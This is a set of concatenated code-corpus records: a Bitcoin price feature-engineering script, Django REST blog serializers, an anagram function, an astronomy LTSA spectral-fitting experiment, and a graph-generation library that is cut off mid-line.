import pandas as pd import numpy as np import pytz from datetime import datetime from utils import load_config config = load_config() tz = pytz.timezone('Asia/Kolkata') data = pd.read_csv('data/raw/Binance_BTCUSDT_minute.csv', parse_dates=['date']) data = data.sort_values(by = 'date').reset_index(drop = True) data.unix = data.unix / 1000 def new_feature(data): data['previous-close'] = data.shift(1)['close'] data['close-change'] = data['close'] - data['previous-close'] data['close-change'] = data['close-change'].fillna(0) return data def process(data): df = pd.DataFrame() df['date'] = [datetime.fromtimestamp(i, tz) for i in data['unix']] df['day_of_month'] = [i.day for i in df['date']] df['day_of_week'] = [i.dayofweek for i in df['date']] df['week_of_year'] = [i.week for i in df['date']] df['month'] = [i.month for i in df['date']] df['open'] = [i for i in data['open']] df['high'] = [i for i in data['high']] df['low'] = [i for i in data['low']] df['close'] = [i for i in data['close']] df['close_change'] = [i for i in data['close-change']] df['date'] = [i.strftime('%Y-%m-%d %H:%M:%S') for i in df['date']] return df data = new_feature(data) final_data = process(data) train_size = int(final_data.shape[0] * config['train_ratio']) train_data, test_data = final_data[:train_size], final_data[train_size+1:] train_data.to_csv('data/feature/train.csv', index=False) test_data.to_csv('data/feature/test.csv', index=False)
none
1
2.882082
3
blogsite/blog/serializers.py
imakshayverma/blogapi
0
6618562
from rest_framework.serializers import ModelSerializer from rest_framework import serializers from .models import ( Post, Paragraph, Comment ) class ParagraphSerializer(ModelSerializer): class Meta: model = Paragraph fields = [ 'id', 'content', 'sequence' ] class CommentSerializer(ModelSerializer): class Meta: model = Comment fields = [ 'comment_text', 'timestamp', ] class ParagraphWithCommentsSerializer(ModelSerializer): comment = CommentSerializer(many=True) class Meta: model = Paragraph fields = [ 'id', 'content', 'sequence', 'comment' ] class PostListSerializer(ModelSerializer): content = ParagraphSerializer(many=True) class Meta: model = Post fields = [ 'id', 'title', 'content', 'timestamp', ] class PostSerializer(ModelSerializer): content = serializers.CharField() class Meta: model = Post fields = [ 'title', 'timestamp', 'content' ] def create(self, validated_data): """ Explicit definition to add respective objects to their respective models - Post and Paragraph. """ para_data = validated_data.pop('content') post = Post.objects.create(**validated_data) para_counter = 0 for para in para_data.split('\n\n'): if len(para.strip('\n')) > 0: para_counter += 1 Paragraph.objects.create(post_id = post, content = para.strip('\n'), sequence=para_counter) return post class PostShowSerializer(ModelSerializer): content = ParagraphWithCommentsSerializer(many=True) class Meta: model = Post fields = [ 'id', 'title', 'timestamp', 'content', ]
from rest_framework.serializers import ModelSerializer from rest_framework import serializers from .models import ( Post, Paragraph, Comment ) class ParagraphSerializer(ModelSerializer): class Meta: model = Paragraph fields = [ 'id', 'content', 'sequence' ] class CommentSerializer(ModelSerializer): class Meta: model = Comment fields = [ 'comment_text', 'timestamp', ] class ParagraphWithCommentsSerializer(ModelSerializer): comment = CommentSerializer(many=True) class Meta: model = Paragraph fields = [ 'id', 'content', 'sequence', 'comment' ] class PostListSerializer(ModelSerializer): content = ParagraphSerializer(many=True) class Meta: model = Post fields = [ 'id', 'title', 'content', 'timestamp', ] class PostSerializer(ModelSerializer): content = serializers.CharField() class Meta: model = Post fields = [ 'title', 'timestamp', 'content' ] def create(self, validated_data): """ Explicit definition to add respective objects to their respective models - Post and Paragraph. """ para_data = validated_data.pop('content') post = Post.objects.create(**validated_data) para_counter = 0 for para in para_data.split('\n\n'): if len(para.strip('\n')) > 0: para_counter += 1 Paragraph.objects.create(post_id = post, content = para.strip('\n'), sequence=para_counter) return post class PostShowSerializer(ModelSerializer): content = ParagraphWithCommentsSerializer(many=True) class Meta: model = Post fields = [ 'id', 'title', 'timestamp', 'content', ]
en
0.912089
Explicit definition to add respective objects to their respective models - Post and Paragraph.
2.379634
2
anagram/anagram.py
gordonli08/Exercism-python
0
6618563
def find_anagrams(word, candidates): origword = sorted(word.lower()) ret = [] for c in candidates: csorted = sorted(c.lower()) if origword == csorted and word.lower() != c.lower(): ret.append(c) return ret
def find_anagrams(word, candidates): origword = sorted(word.lower()) ret = [] for c in candidates: csorted = sorted(c.lower()) if origword == csorted and word.lower() != c.lower(): ret.append(c) return ret
none
1
3.757511
4
playground/try_ltsa.py
mikeireland/funnelweb
0
6618564
<reponame>mikeireland/funnelweb<gh_stars>0 """ n_neighbors 20, n_known 570 Teff had MAD: 139.1, StDev: 1777.5 logg had MAD: 0.07, StDev: 0.34 Fe_H had MAD: 0.07, StDev: 0.20 alpha_Fe had MAD: 0.06, StDev: 0.14 n_neighbors 20, n_known 570 Teff had MAD: 208.9, StDev: 1728.1 logg had MAD: 0.11, StDev: 0.40 Fe_H had MAD: 0.07, StDev: 0.19 alpha_Fe had MAD: 0.05, StDev: 0.14 n_neighbors 20, n_known 1140 Teff had MAD: 445.1, StDev: 2686.3 logg had MAD: 0.17, StDev: 0.58 Fe_H had MAD: 0.07, StDev: 0.23 alpha_Fe had MAD: 0.04, StDev: 0.12 n_neighbors 20, n_known 1140 Teff had MAD: 388.4, StDev: 2850.1 logg had MAD: 0.16, StDev: 0.53 Fe_H had MAD: 0.06, StDev: 0.20 alpha_Fe had MAD: 0.04, StDev: 0.12 n_neighbors 20, n_known 285 Teff had MAD: 123.8, StDev: 3169.5 logg had MAD: 0.09, StDev: 0.43 Fe_H had MAD: 0.10, StDev: 0.27 alpha_Fe had MAD: 0.08, StDev: 0.16 n_neighbors 10, n_known 570 Teff had MAD: 248.4, StDev: 2957.9 logg had MAD: 0.12, StDev: 0.73 Fe_H had MAD: 0.06, StDev: 0.24 alpha_Fe had MAD: 0.04, StDev: 0.16 n_neighbors 10, n_known 570 Teff had MAD: 160.6, StDev: 2542.1 logg had MAD: 0.07, StDev: 0.61 Fe_H had MAD: 0.06, StDev: 0.26 alpha_Fe had MAD: 0.05, StDev: 0.16 n_neighbors 15, n_known 570 Teff had MAD: 270.7, StDev: 2862.6 logg had MAD: 0.12, StDev: 0.55 Fe_H had MAD: 0.06, StDev: 0.19 alpha_Fe had MAD: 0.05, StDev: 0.14 n_neighbors 25, n_known 570 Teff had MAD: 205.4, StDev: 2022.6 logg had MAD: 0.13, StDev: 0.46 Fe_H had MAD: 0.08, StDev: 0.18 alpha_Fe had MAD: 0.07, StDev: 0.14 n_neighbors 30, n_known 570 Teff had MAD: 244.2, StDev: 1991.7 logg had MAD: 0.13, StDev: 0.44 Fe_H had MAD: 0.10, StDev: 0.23 alpha_Fe had MAD: 0.07, StDev: 0.14 """ from __future__ import division, print_function import numpy as np import matplotlib.pyplot as plt import matplotlib.cm as cm import astropy.io.fits as pyfits import pdb plt.ion() n_neighbors = 40 #Called "k" in Yang (2006) n_dim = 4 n_known=570*2 beta = 1e3 #1e3 or 1 #Import the data spect = pyfits.getdata('ccd1.fits') spect += np.random.normal(size=spect.shape)*1e-2 params = pyfits.getdata('ccd1.fits', 1) #params.names are the names of parameters. for s in spect: s /= np.mean(s) #Pick some random reference spectra. ref_obj = (np.random.random(500)*spect.shape[0]).astype(int) print("Finding pairwise distances") ssum = np.sum(spect**2, 1) dist_squared = np.tile(ssum, spect.shape[0]).reshape((spect.shape[0], spect.shape[0])) + \ np.repeat(ssum, spect.shape[0]).reshape((spect.shape[0], spect.shape[0])) - \ 2*np.dot(spect, spect.T) I_neighborhood = np.eye(n_neighbors) M_align = np.zeros( (spect.shape[0], spect.shape[0]) ) print("Creating Matrix M") #Now find the neighborhood of each spectrum neighbors = np.zeros( (spect.shape[0], n_neighbors), dtype=np.int) for i in range(spect.shape[0]): s = np.argsort(dist_squared[i]) neighbors[i] = s[:n_neighbors] #Find the principle components. X = spect[neighbors[i],:] X_mn = X.mean(axis=0) for j in range(n_neighbors): X[j] -= X_mn cov = np.dot(X, X.T) W, V = np.linalg.eigh(cov) G = np.append(np.ones( (n_neighbors,1) )/np.sqrt(n_neighbors), V[:,-n_dim:], 1) M_align[np.meshgrid(neighbors[i], neighbors[i], indexing='ij')] +=\ I_neighborhood - np.dot(G, G.T) #OK... now we go through and add the constraints. known_objects = (np.random.random( n_known )*spect.shape[0]).astype(int) y_ltsa = np.zeros( (n_dim, spect.shape[0]) ) for i in range(np.min([len(params.names), n_dim])): y_ltsa[i, known_objects] = beta*params[params.names[i]][known_objects] #!!! includes beta unknown_objects = np.where(y_ltsa[0] ==0)[0] if beta == 1: print("Solving system of equations") #Equation (12) of Yang et al. M12 = M_align[np.meshgrid(unknown_objects, known_objects, indexing='ij')] M22 = M_align[np.meshgrid(unknown_objects, unknown_objects, indexing='ij')] for i in range(n_dim): y_ltsa[i, unknown_objects] = np.linalg.solve(M22, -np.dot(M12, params[params.names[i]][known_objects])) else: M_nonsup = M_align.copy() M_align[known_objects, known_objects] += beta for i in range(n_dim): #Equation (21) of Yang et al. y_ltsa[i] = np.linalg.solve(M_align, y_ltsa[i]) #Median absolute deviations... deviates = np.zeros_like(y_ltsa) for i in range(n_dim): deviates[i] = y_ltsa[i] - params[params.names[i]] mad_unknown = np.median(np.abs(deviates[:,unknown_objects]), axis=1) std_unknown = np.std(deviates[:,unknown_objects], axis=1) mad_known = np.median(np.abs(deviates[:,known_objects]), axis=1) std_known = np.std(deviates[:,known_objects], axis=1) print("n_neighbors {}, n_known {}".format(n_neighbors, n_known)) print(params.names[0] + " had unknown MAD: {:5.1f}, StDev: {:5.1f}".format(mad_unknown[0], std_unknown[0])) for i in range(1,4): print(params.names[i] + " had unknown MAD: {:5.2f}, StDev: {:5.2f}".format(mad_unknown[i], std_unknown[i])) print(params.names[0] + " had known MAD: {:5.1f}, StDev: {:5.1f}".format(mad_known[0], std_known[0])) for i in range(1,4): print(params.names[i] + " had known MAD: {:5.2f}, StDev: {:5.2f}".format(mad_known[i], std_known[i])) log_teff = np.log10(np.minimum(y_ltsa[0,unknown_objects], 30e3)) plt.clf() plt.scatter(y_ltsa[2,unknown_objects], y_ltsa[3,unknown_objects],c=log_teff, cmap=cm.jet_r,s=1) plt.colorbar() plt.scatter(y_ltsa[2,known_objects], y_ltsa[3,known_objects], color='black', s=20, marker='x') plt.axis([-2.5,1,-0.2,0.6]) plt.xlabel('[M/H]') plt.ylabel(r'[$\alpha$/Fe]')
""" n_neighbors 20, n_known 570 Teff had MAD: 139.1, StDev: 1777.5 logg had MAD: 0.07, StDev: 0.34 Fe_H had MAD: 0.07, StDev: 0.20 alpha_Fe had MAD: 0.06, StDev: 0.14 n_neighbors 20, n_known 570 Teff had MAD: 208.9, StDev: 1728.1 logg had MAD: 0.11, StDev: 0.40 Fe_H had MAD: 0.07, StDev: 0.19 alpha_Fe had MAD: 0.05, StDev: 0.14 n_neighbors 20, n_known 1140 Teff had MAD: 445.1, StDev: 2686.3 logg had MAD: 0.17, StDev: 0.58 Fe_H had MAD: 0.07, StDev: 0.23 alpha_Fe had MAD: 0.04, StDev: 0.12 n_neighbors 20, n_known 1140 Teff had MAD: 388.4, StDev: 2850.1 logg had MAD: 0.16, StDev: 0.53 Fe_H had MAD: 0.06, StDev: 0.20 alpha_Fe had MAD: 0.04, StDev: 0.12 n_neighbors 20, n_known 285 Teff had MAD: 123.8, StDev: 3169.5 logg had MAD: 0.09, StDev: 0.43 Fe_H had MAD: 0.10, StDev: 0.27 alpha_Fe had MAD: 0.08, StDev: 0.16 n_neighbors 10, n_known 570 Teff had MAD: 248.4, StDev: 2957.9 logg had MAD: 0.12, StDev: 0.73 Fe_H had MAD: 0.06, StDev: 0.24 alpha_Fe had MAD: 0.04, StDev: 0.16 n_neighbors 10, n_known 570 Teff had MAD: 160.6, StDev: 2542.1 logg had MAD: 0.07, StDev: 0.61 Fe_H had MAD: 0.06, StDev: 0.26 alpha_Fe had MAD: 0.05, StDev: 0.16 n_neighbors 15, n_known 570 Teff had MAD: 270.7, StDev: 2862.6 logg had MAD: 0.12, StDev: 0.55 Fe_H had MAD: 0.06, StDev: 0.19 alpha_Fe had MAD: 0.05, StDev: 0.14 n_neighbors 25, n_known 570 Teff had MAD: 205.4, StDev: 2022.6 logg had MAD: 0.13, StDev: 0.46 Fe_H had MAD: 0.08, StDev: 0.18 alpha_Fe had MAD: 0.07, StDev: 0.14 n_neighbors 30, n_known 570 Teff had MAD: 244.2, StDev: 1991.7 logg had MAD: 0.13, StDev: 0.44 Fe_H had MAD: 0.10, StDev: 0.23 alpha_Fe had MAD: 0.07, StDev: 0.14 """ from __future__ import division, print_function import numpy as np import matplotlib.pyplot as plt import matplotlib.cm as cm import astropy.io.fits as pyfits import pdb plt.ion() n_neighbors = 40 #Called "k" in Yang (2006) n_dim = 4 n_known=570*2 beta = 1e3 #1e3 or 1 #Import the data spect = pyfits.getdata('ccd1.fits') spect += np.random.normal(size=spect.shape)*1e-2 params = pyfits.getdata('ccd1.fits', 1) #params.names are the names of parameters. for s in spect: s /= np.mean(s) #Pick some random reference spectra. ref_obj = (np.random.random(500)*spect.shape[0]).astype(int) print("Finding pairwise distances") ssum = np.sum(spect**2, 1) dist_squared = np.tile(ssum, spect.shape[0]).reshape((spect.shape[0], spect.shape[0])) + \ np.repeat(ssum, spect.shape[0]).reshape((spect.shape[0], spect.shape[0])) - \ 2*np.dot(spect, spect.T) I_neighborhood = np.eye(n_neighbors) M_align = np.zeros( (spect.shape[0], spect.shape[0]) ) print("Creating Matrix M") #Now find the neighborhood of each spectrum neighbors = np.zeros( (spect.shape[0], n_neighbors), dtype=np.int) for i in range(spect.shape[0]): s = np.argsort(dist_squared[i]) neighbors[i] = s[:n_neighbors] #Find the principle components. X = spect[neighbors[i],:] X_mn = X.mean(axis=0) for j in range(n_neighbors): X[j] -= X_mn cov = np.dot(X, X.T) W, V = np.linalg.eigh(cov) G = np.append(np.ones( (n_neighbors,1) )/np.sqrt(n_neighbors), V[:,-n_dim:], 1) M_align[np.meshgrid(neighbors[i], neighbors[i], indexing='ij')] +=\ I_neighborhood - np.dot(G, G.T) #OK... now we go through and add the constraints. known_objects = (np.random.random( n_known )*spect.shape[0]).astype(int) y_ltsa = np.zeros( (n_dim, spect.shape[0]) ) for i in range(np.min([len(params.names), n_dim])): y_ltsa[i, known_objects] = beta*params[params.names[i]][known_objects] #!!! includes beta unknown_objects = np.where(y_ltsa[0] ==0)[0] if beta == 1: print("Solving system of equations") #Equation (12) of Yang et al. M12 = M_align[np.meshgrid(unknown_objects, known_objects, indexing='ij')] M22 = M_align[np.meshgrid(unknown_objects, unknown_objects, indexing='ij')] for i in range(n_dim): y_ltsa[i, unknown_objects] = np.linalg.solve(M22, -np.dot(M12, params[params.names[i]][known_objects])) else: M_nonsup = M_align.copy() M_align[known_objects, known_objects] += beta for i in range(n_dim): #Equation (21) of Yang et al. y_ltsa[i] = np.linalg.solve(M_align, y_ltsa[i]) #Median absolute deviations... deviates = np.zeros_like(y_ltsa) for i in range(n_dim): deviates[i] = y_ltsa[i] - params[params.names[i]] mad_unknown = np.median(np.abs(deviates[:,unknown_objects]), axis=1) std_unknown = np.std(deviates[:,unknown_objects], axis=1) mad_known = np.median(np.abs(deviates[:,known_objects]), axis=1) std_known = np.std(deviates[:,known_objects], axis=1) print("n_neighbors {}, n_known {}".format(n_neighbors, n_known)) print(params.names[0] + " had unknown MAD: {:5.1f}, StDev: {:5.1f}".format(mad_unknown[0], std_unknown[0])) for i in range(1,4): print(params.names[i] + " had unknown MAD: {:5.2f}, StDev: {:5.2f}".format(mad_unknown[i], std_unknown[i])) print(params.names[0] + " had known MAD: {:5.1f}, StDev: {:5.1f}".format(mad_known[0], std_known[0])) for i in range(1,4): print(params.names[i] + " had known MAD: {:5.2f}, StDev: {:5.2f}".format(mad_known[i], std_known[i])) log_teff = np.log10(np.minimum(y_ltsa[0,unknown_objects], 30e3)) plt.clf() plt.scatter(y_ltsa[2,unknown_objects], y_ltsa[3,unknown_objects],c=log_teff, cmap=cm.jet_r,s=1) plt.colorbar() plt.scatter(y_ltsa[2,known_objects], y_ltsa[3,known_objects], color='black', s=20, marker='x') plt.axis([-2.5,1,-0.2,0.6]) plt.xlabel('[M/H]') plt.ylabel(r'[$\alpha$/Fe]')
en
0.895179
n_neighbors 20, n_known 570 Teff had MAD: 139.1, StDev: 1777.5 logg had MAD: 0.07, StDev: 0.34 Fe_H had MAD: 0.07, StDev: 0.20 alpha_Fe had MAD: 0.06, StDev: 0.14 n_neighbors 20, n_known 570 Teff had MAD: 208.9, StDev: 1728.1 logg had MAD: 0.11, StDev: 0.40 Fe_H had MAD: 0.07, StDev: 0.19 alpha_Fe had MAD: 0.05, StDev: 0.14 n_neighbors 20, n_known 1140 Teff had MAD: 445.1, StDev: 2686.3 logg had MAD: 0.17, StDev: 0.58 Fe_H had MAD: 0.07, StDev: 0.23 alpha_Fe had MAD: 0.04, StDev: 0.12 n_neighbors 20, n_known 1140 Teff had MAD: 388.4, StDev: 2850.1 logg had MAD: 0.16, StDev: 0.53 Fe_H had MAD: 0.06, StDev: 0.20 alpha_Fe had MAD: 0.04, StDev: 0.12 n_neighbors 20, n_known 285 Teff had MAD: 123.8, StDev: 3169.5 logg had MAD: 0.09, StDev: 0.43 Fe_H had MAD: 0.10, StDev: 0.27 alpha_Fe had MAD: 0.08, StDev: 0.16 n_neighbors 10, n_known 570 Teff had MAD: 248.4, StDev: 2957.9 logg had MAD: 0.12, StDev: 0.73 Fe_H had MAD: 0.06, StDev: 0.24 alpha_Fe had MAD: 0.04, StDev: 0.16 n_neighbors 10, n_known 570 Teff had MAD: 160.6, StDev: 2542.1 logg had MAD: 0.07, StDev: 0.61 Fe_H had MAD: 0.06, StDev: 0.26 alpha_Fe had MAD: 0.05, StDev: 0.16 n_neighbors 15, n_known 570 Teff had MAD: 270.7, StDev: 2862.6 logg had MAD: 0.12, StDev: 0.55 Fe_H had MAD: 0.06, StDev: 0.19 alpha_Fe had MAD: 0.05, StDev: 0.14 n_neighbors 25, n_known 570 Teff had MAD: 205.4, StDev: 2022.6 logg had MAD: 0.13, StDev: 0.46 Fe_H had MAD: 0.08, StDev: 0.18 alpha_Fe had MAD: 0.07, StDev: 0.14 n_neighbors 30, n_known 570 Teff had MAD: 244.2, StDev: 1991.7 logg had MAD: 0.13, StDev: 0.44 Fe_H had MAD: 0.10, StDev: 0.23 alpha_Fe had MAD: 0.07, StDev: 0.14 #Called "k" in Yang (2006) #1e3 or 1 #Import the data #params.names are the names of parameters. #Pick some random reference spectra. #Now find the neighborhood of each spectrum #Find the principle components. #OK... now we go through and add the constraints. #!!! includes beta #Equation (12) of Yang et al. #Equation (21) of Yang et al. #Median absolute deviations...
1.300569
1
src/numgraph/distributions.py
gravins/NumGraph
0
6618565
<reponame>gravins/NumGraph<filename>src/numgraph/distributions.py<gh_stars>0 import numpy as np from collections import Counter from numpy.typing import NDArray from itertools import combinations from typing import List, Callable, Optional from numpy.random import Generator, default_rng from numgraph.utils import remove_self_loops, to_undirected, coalesce def erdos_renyi(num_nodes: int, prob: float, directed: bool = False, rng: Optional[Generator] = None) -> NDArray: """ Returns a random graph, also known as an Erdos-Renyi graph or a binomial graph. The model chooses each of the possible edges with a defined probability. Parameters ---------- num_nodes : int The number of nodes prob : float Probability of an edge directed : bool, optional If set to True, will return a directed graph, by default False rng : Generator, optional Numpy random number generator, by default None Returns ------- NDArray The random graph (num_edges x 2) """ assert num_nodes >= 0 and prob <=1 and prob > 0 if rng is None: rng = default_rng() mask = rng.random((num_nodes, num_nodes)) <= prob if not directed: mask = mask + mask.T mask = remove_self_loops(mask) edge_list = np.argwhere(mask) return edge_list def barabasi_albert(num_nodes: int, num_edges: int, rng: Optional[Generator] = None) -> NDArray: """ Returns a graph sampled from the Barabasi-Albert (BA) model. The graph is built incrementally by adding `num_edges` arcs from a new node to already existing ones with preferential attachment towards nodes with high degree. Parameters ---------- num_nodes : int The number of nodes num_edges : int The number of edges rng : Optional[Generator], optional Numpy random number generator, by default None Returns ------- NDArray The Barabasi-Albert (num_edges x 2) """ assert num_nodes >= 0 and num_edges > 0 and num_edges < num_nodes if rng is None: rng = default_rng() sources, targets = np.arange(num_edges), rng.permutation(num_edges) for i in range(num_edges, num_nodes): sources = np.concatenate([sources, np.full((num_edges, ), i, dtype=np.long)]) choice = rng.choice(np.concatenate([sources, targets]), num_edges) targets = np.concatenate([targets, choice]) sources, targets = sources.reshape((-1, 1)), targets.reshape((-1, 1)) edge_list = np.concatenate([sources, targets], axis=1) edge_list = remove_self_loops(edge_list) edge_list = to_undirected(edge_list) return coalesce(edge_list) def clique(num_nodes: int) -> NDArray: """ Returns a complete graph, a.k.a. a clique. Parameters ---------- num_nodes : int The number of nodes Returns ------- NDArray The clique (num_edges x 2) """ edge_list = np.array(list(combinations(range(num_nodes), r=2))) edge_list = to_undirected(edge_list) return coalesce(edge_list) def stochastic_block_model(block_sizes: List[int], probs: List[List[float]], generator: Callable, rng: Optional[Generator] = None) -> NDArray: """ Returns a stochastic block model graph. This model partitions the nodes into blocks of defined sizes, and places edges between pairs of nodes depending on a probability matrix. Such a matrix specifies edge probabilities between and inside blocks. Parameters ---------- block_sizes : List[int] Sizes of blocks probs : List[List[float]] The squared probability matrix (num_blocks x num_blocks). The element i,j represents the edge probability between blocks i and j. The element i,i define the edge probability inside block i. generator : Callable A callable that generates communities with size depending on block_sizes rng : Generator, optional Numpy random number generator, by default None Returns ------- NDArray The stochastic block model graph (num_edges x 2) """ assert all(block_sizes) and len(probs) == len(block_sizes) assert all([len(p) == len(probs) for p in probs]) and all([all(p) for p in probs]) if rng is None: rng = default_rng() communities = [generator(b, probs[i][i], rng) for i, b in enumerate(block_sizes)] # Update communities's indices sizes = {} first_id = 0 for i in range(len(block_sizes)): communities[i] += first_id sizes[i] = first_id first_id += block_sizes[i] # Compute iter-block links edges = [] for i in range(len(probs)): for j in range(len(probs)): if i == j: continue p = probs[i][j] size_c1, size_c2 = block_sizes[i], block_sizes[j] mask = rng.random((size_c1, size_c2)) <= p inter_block_edges = np.argwhere(mask) inter_block_edges[:, 0] += sizes[i] inter_block_edges[:, 1] += sizes[j] edges.append(inter_block_edges) return np.concatenate(edges + communities) def full_grid(height: int, width: int) -> NDArray: """ Returns a full two-dimensional rectangular grid lattice graph. Example 1 - 2 - 3 | X | X | 4 - 5 - 6 Parameters ---------- height : int Number of vertices in the vertical axis width : int Number of vertices in the horizontal axis Returns ------- NDArray The full two-dimensional rectangular grid lattice graph (num_edges x 2) """ w = width kernel = np.array([-w - 1, -w, -w + 1, -1, w, w - 1, w, w + 1]) return grid(height, width, kernel) def simple_grid(height: int, width: int) -> NDArray: """ Returns a two-dimensional rectangular grid lattice graph. Example 1 -- 2 -- 3 | | | 4 -- 5 -- 6 Parameters ---------- height : int Number of vertices in the vertical axis width : int Number of vertices in the horizontal axis Returns ------- NDArray The two-dimensional rectangular grid lattice graph (num_edges x 2) """ w = width kernel = np.array([-w, -1, 1, w]) return grid(height, width, kernel) def grid(height: int, width: int, kernel: NDArray) -> NDArray: """ Ausiliar function for grid graph generation. Parameters ---------- height : int Number of vertices in the vertical axis width : int Number of vertices in the horizontal axis kernel : NDArray The kernel Returns ------- NDArray The two-dimensional grid lattice graph (num_edges x 2) """ num_nodes = height * width K = len(kernel) sources = np.arange(num_nodes, dtype=np.long).repeat(K) targets = sources + np.tile(kernel, num_nodes) mask = (targets >= 0) & (targets < num_nodes) sources, targets = sources[mask].reshape((-1, 1)), targets[mask].reshape((-1, 1)) edge_list = np.concatenate([sources, targets], axis=1) # Remove edges (u,v) from a boundary node to the first node of the new row. submask_1 = ((edge_list[:, 0] + 1) % width == 0) & ((edge_list[:, 1]) % width == 0) # As the graph is undirected, remove the corresponding edges (v, u). submask_2 = ((edge_list[:, 0]) % width == 0) & ((edge_list[:, 1] + 1) % width == 0) mask = ~(submask_1 | submask_2) return edge_list[mask] def star(num_nodes: int, directed: bool = False) -> NDArray: """ Returns a star graph. Parameters ---------- num_nodes : int The number of nodes directed : bool, optional If set to True, will return a directed graph, by default False Returns ------- NDArray The star graph (num_edges x 2) """ edges = np.stack([np.zeros((num_nodes - 1, ), dtype = int), np.arange(1, num_nodes)], axis=1) if not directed: edges = to_undirected(edges) return edges def random_tree(num_nodes: int, directed: bool = True, rng: Optional[Generator] = None) -> NDArray: """ Returns a random tree computed using a random Prufer sequence. Parameters ---------- num_nodes : int [description] directed : bool, optional If set to True, will return a directed graph, by default True rng : Optional[Generator], optional Numpy random number generator, by default None Returns ------- NDArray The random tree (num_edges x 2) """ if rng is None: rng = default_rng() prufer_seq = [rng.choice(range(num_nodes)) for _ in range(num_nodes - 2)] # Node degree is equivalent to the number of times it appears in the sequence + 1 degree = Counter(prufer_seq + list(range(num_nodes))) edges = [] visited = set() for v in prufer_seq: for u in range(num_nodes): if degree[u] == 1: edges.append([v, u]) degree[v] -= 1 degree[u] -= 1 visited.add(u) break u, v = degree.keys() - visited edges.append([u,v]) edges = np.asarray(edges) if not directed: edges = to_undirected(edges) return edges
import numpy as np from collections import Counter from numpy.typing import NDArray from itertools import combinations from typing import List, Callable, Optional from numpy.random import Generator, default_rng from numgraph.utils import remove_self_loops, to_undirected, coalesce def erdos_renyi(num_nodes: int, prob: float, directed: bool = False, rng: Optional[Generator] = None) -> NDArray: """ Returns a random graph, also known as an Erdos-Renyi graph or a binomial graph. The model chooses each of the possible edges with a defined probability. Parameters ---------- num_nodes : int The number of nodes prob : float Probability of an edge directed : bool, optional If set to True, will return a directed graph, by default False rng : Generator, optional Numpy random number generator, by default None Returns ------- NDArray The random graph (num_edges x 2) """ assert num_nodes >= 0 and prob <=1 and prob > 0 if rng is None: rng = default_rng() mask = rng.random((num_nodes, num_nodes)) <= prob if not directed: mask = mask + mask.T mask = remove_self_loops(mask) edge_list = np.argwhere(mask) return edge_list def barabasi_albert(num_nodes: int, num_edges: int, rng: Optional[Generator] = None) -> NDArray: """ Returns a graph sampled from the Barabasi-Albert (BA) model. The graph is built incrementally by adding `num_edges` arcs from a new node to already existing ones with preferential attachment towards nodes with high degree. Parameters ---------- num_nodes : int The number of nodes num_edges : int The number of edges rng : Optional[Generator], optional Numpy random number generator, by default None Returns ------- NDArray The Barabasi-Albert (num_edges x 2) """ assert num_nodes >= 0 and num_edges > 0 and num_edges < num_nodes if rng is None: rng = default_rng() sources, targets = np.arange(num_edges), rng.permutation(num_edges) for i in range(num_edges, num_nodes): sources = np.concatenate([sources, np.full((num_edges, ), i, dtype=np.long)]) choice = rng.choice(np.concatenate([sources, targets]), num_edges) targets = np.concatenate([targets, choice]) sources, targets = sources.reshape((-1, 1)), targets.reshape((-1, 1)) edge_list = np.concatenate([sources, targets], axis=1) edge_list = remove_self_loops(edge_list) edge_list = to_undirected(edge_list) return coalesce(edge_list) def clique(num_nodes: int) -> NDArray: """ Returns a complete graph, a.k.a. a clique. Parameters ---------- num_nodes : int The number of nodes Returns ------- NDArray The clique (num_edges x 2) """ edge_list = np.array(list(combinations(range(num_nodes), r=2))) edge_list = to_undirected(edge_list) return coalesce(edge_list) def stochastic_block_model(block_sizes: List[int], probs: List[List[float]], generator: Callable, rng: Optional[Generator] = None) -> NDArray: """ Returns a stochastic block model graph. This model partitions the nodes into blocks of defined sizes, and places edges between pairs of nodes depending on a probability matrix. Such a matrix specifies edge probabilities between and inside blocks. Parameters ---------- block_sizes : List[int] Sizes of blocks probs : List[List[float]] The squared probability matrix (num_blocks x num_blocks). The element i,j represents the edge probability between blocks i and j. The element i,i define the edge probability inside block i. generator : Callable A callable that generates communities with size depending on block_sizes rng : Generator, optional Numpy random number generator, by default None Returns ------- NDArray The stochastic block model graph (num_edges x 2) """ assert all(block_sizes) and len(probs) == len(block_sizes) assert all([len(p) == len(probs) for p in probs]) and all([all(p) for p in probs]) if rng is None: rng = default_rng() communities = [generator(b, probs[i][i], rng) for i, b in enumerate(block_sizes)] # Update communities's indices sizes = {} first_id = 0 for i in range(len(block_sizes)): communities[i] += first_id sizes[i] = first_id first_id += block_sizes[i] # Compute iter-block links edges = [] for i in range(len(probs)): for j in range(len(probs)): if i == j: continue p = probs[i][j] size_c1, size_c2 = block_sizes[i], block_sizes[j] mask = rng.random((size_c1, size_c2)) <= p inter_block_edges = np.argwhere(mask) inter_block_edges[:, 0] += sizes[i] inter_block_edges[:, 1] += sizes[j] edges.append(inter_block_edges) return np.concatenate(edges + communities) def full_grid(height: int, width: int) -> NDArray: """ Returns a full two-dimensional rectangular grid lattice graph. Example 1 - 2 - 3 | X | X | 4 - 5 - 6 Parameters ---------- height : int Number of vertices in the vertical axis width : int Number of vertices in the horizontal axis Returns ------- NDArray The full two-dimensional rectangular grid lattice graph (num_edges x 2) """ w = width kernel = np.array([-w - 1, -w, -w + 1, -1, w, w - 1, w, w + 1]) return grid(height, width, kernel) def simple_grid(height: int, width: int) -> NDArray: """ Returns a two-dimensional rectangular grid lattice graph. Example 1 -- 2 -- 3 | | | 4 -- 5 -- 6 Parameters ---------- height : int Number of vertices in the vertical axis width : int Number of vertices in the horizontal axis Returns ------- NDArray The two-dimensional rectangular grid lattice graph (num_edges x 2) """ w = width kernel = np.array([-w, -1, 1, w]) return grid(height, width, kernel) def grid(height: int, width: int, kernel: NDArray) -> NDArray: """ Ausiliar function for grid graph generation. Parameters ---------- height : int Number of vertices in the vertical axis width : int Number of vertices in the horizontal axis kernel : NDArray The kernel Returns ------- NDArray The two-dimensional grid lattice graph (num_edges x 2) """ num_nodes = height * width K = len(kernel) sources = np.arange(num_nodes, dtype=np.long).repeat(K) targets = sources + np.tile(kernel, num_nodes) mask = (targets >= 0) & (targets < num_nodes) sources, targets = sources[mask].reshape((-1, 1)), targets[mask].reshape((-1, 1)) edge_list = np.concatenate([sources, targets], axis=1) # Remove edges (u,v) from a boundary node to the first node of the new row. submask_1 = ((edge_list[:, 0] + 1) % width == 0) & ((edge_list[:, 1]) % width == 0) # As the graph is undirected, remove the corresponding edges (v, u). submask_2 = ((edge_list[:, 0]) % width == 0) & ((edge_list[:, 1] + 1) % width == 0) mask = ~(submask_1 